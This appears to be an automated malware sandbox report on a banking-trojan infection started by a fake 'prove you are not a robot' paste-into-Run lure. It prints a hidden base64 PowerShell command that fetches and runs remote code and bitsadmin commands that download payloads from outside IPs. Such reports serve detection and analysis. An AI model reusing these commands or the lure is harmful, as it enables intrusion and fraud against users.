Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.147.5:443 -> 192.168.2.16:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49738 version: TLS 1.2

E-Banking Fraud

barindex
Malicious encrypted Powershell command line found
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -windowstyle hidden -enc aQBlAHgAKABpAHcAcgAgAC0AVQByAGkAIAAnAGgAdAB0AHAAOgAvAC8AMQA5ADMALgAxADYAOQAuADEAMAA1AC4AMQAwADMALwBpAG4ALgBwAGgAcAA/AGEAYwB0AGkAbwBuAD0AMQAnACkALgBjAG8AbgB0AGUAbgB0AA==

System Summary

barindex
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\l\Il.exeJump to dropped file
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: classification engineClassification label: mal100.bank.troj.evad.win@37/20@8/145
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3648:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:904:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3252:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4932:120:WilError_03
Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\BIT5007.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.ini
Source: C:\Windows\System32\svchost.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\New xlsx docs074252657723824 - Tuesday, December 3, 2024 at 03_42_05 PM_html.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1860,i,548011947270755985,424634908409210537,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1860,i,548011947270755985,424634908409210537,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -windowstyle hidden -enc aQBlAHgAKABpAHcAcgAgAC0AVQByAGkAIAAnAGgAdAB0AHAAOgAvAC8AMQA5ADMALgAxADYAOQAuADEAMAA1AC4AMQAwADMALwBpAG4ALgBwAGgAcAA/AGEAYwB0AGkAbwBuAD0AMQAnACkALgBjAG8AbgB0AGUAbgB0AA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\l\Il.exe "C:\l\Il.exe"
Source: C:\l\Il.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 1 8.8.8.8
Source: C:\Windows\SysWOW64\PING.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\l\Il.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\user\AppData\Local\Temp\UnRAR.exe"
Source: C:\Windows\SysWOW64\bitsadmin.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\l\Il.exe "C:\l\Il.exe"
Source: C:\l\Il.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 1 8.8.8.8
Source: C:\l\Il.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\user\AppData\Local\Temp\UnRAR.exe"
Source: C:\l\Il.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer "DownloadArchive" /priority high "http://194.15.46.189/jstsolqx.rar" "C:\Users\user\AppData\Local\Temp\jstsolqx.rar"
Source: C:\Windows\SysWOW64\bitsadmin.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\l\Il.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer "DownloadArchive" /priority high "http://194.15.46.189/jstsolqx.rar" "C:\Users\user\AppData\Local\Temp\jstsolqx.rar"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
Source: C:\l\Il.exeSection loaded: uxtheme.dll
Source: C:\l\Il.exeSection loaded: userenv.dll
Source: C:\l\Il.exeSection loaded: apphelp.dll
Source: C:\l\Il.exeSection loaded: propsys.dll
Source: C:\l\Il.exeSection loaded: dwmapi.dll
Source: C:\l\Il.exeSection loaded: cryptbase.dll
Source: C:\l\Il.exeSection loaded: oleacc.dll
Source: C:\l\Il.exeSection loaded: ntmarta.dll
Source: C:\l\Il.exeSection loaded: version.dll
Source: C:\l\Il.exeSection loaded: shfolder.dll
Source: C:\l\Il.exeSection loaded: kernel.appcore.dll
Source: C:\l\Il.exeSection loaded: windows.storage.dll
Source: C:\l\Il.exeSection loaded: wldp.dll
Source: C:\l\Il.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: bitsproxy.dll
Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: bitsproxy.dll
Source: C:\l\Il.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Data Obfuscation

barindex
Suspicious powershell command line found
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -windowstyle hidden -enc aQBlAHgAKABpAHcAcgAgAC0AVQByAGkAIAAnAGgAdAB0AHAAOgAvAC8AMQA5ADMALgAxADYAOQAuADEAMAA1AC4AMQAwADMALwBpAG4ALgBwAGgAcAA/AGEAYwB0AGkAbwBuAD0AMQAnACkALgBjAG8AbgB0AGUAbgB0AA==

Persistence and Installation Behavior

barindex
Detect drive by download via clipboard copy & paste
Source: screenshotOCR Text: docs7425265772382, X e docs7425265772382, X e docs7425265772382, X C O File I Verification Steps To better prove you are not a robot please. Press and hold the windows keyg + R In the verification window; press Ctrl + V Press Enter on your keyboard to finish. Ray 10: c5cbf1a28d6b9ccc Start 0837 ENG p Type here to search SG 12/12/2024
Source: screenshotOCR Text: docs7425265772382, X e docs7425265772382, X e docs7425265772382, X C O File I Verification Steps To better prove you are not a robot please. Press and hold the windows key + R In the verification window; press Ctrl + V Press Enter on your keyboard to finish. Ray 10: c5cbf1a28d6b9ccc 0837 ENG p Type here to search SG 12/12/2024
Source: screenshotOCR Text: e X I e X e docs07425265772382, X + C O File I Verification Steps To better prove you are not a robot please. Press and hold the windows keyg + R In the verification window; press Ctrl + V Press Enter on your keyboard to finish. Ray 10: c5cbf1a28d6b9ccc Run Type the name of a program, folder, document or Internet resource, and Windows will open It for you. Open: 0K Cancel Browse... 0837 ENG p Type here to search SG 12/12/2024
Tries to download files via bitsadmin
Source: C:\l\Il.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\user\AppData\Local\Temp\UnRAR.exe"
Source: C:\l\Il.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\user\AppData\Local\Temp\UnRAR.exe"
Source: C:\l\Il.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer "DownloadArchive" /priority high "http://194.15.46.189/jstsolqx.rar" "C:\Users\user\AppData\Local\Temp\jstsolqx.rar"
Source: C:\l\Il.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer "DownloadArchive" /priority high "http://194.15.46.189/jstsolqx.rar" "C:\Users\user\AppData\Local\Temp\jstsolqx.rar"
Source: C:\l\Il.exeFile created: C:\Users\user\AppData\Local\Temp\nstD940.tmp\nsExec.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\l\Il.exeJump to dropped file
Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\BIT5007.tmpJump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 82Jump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
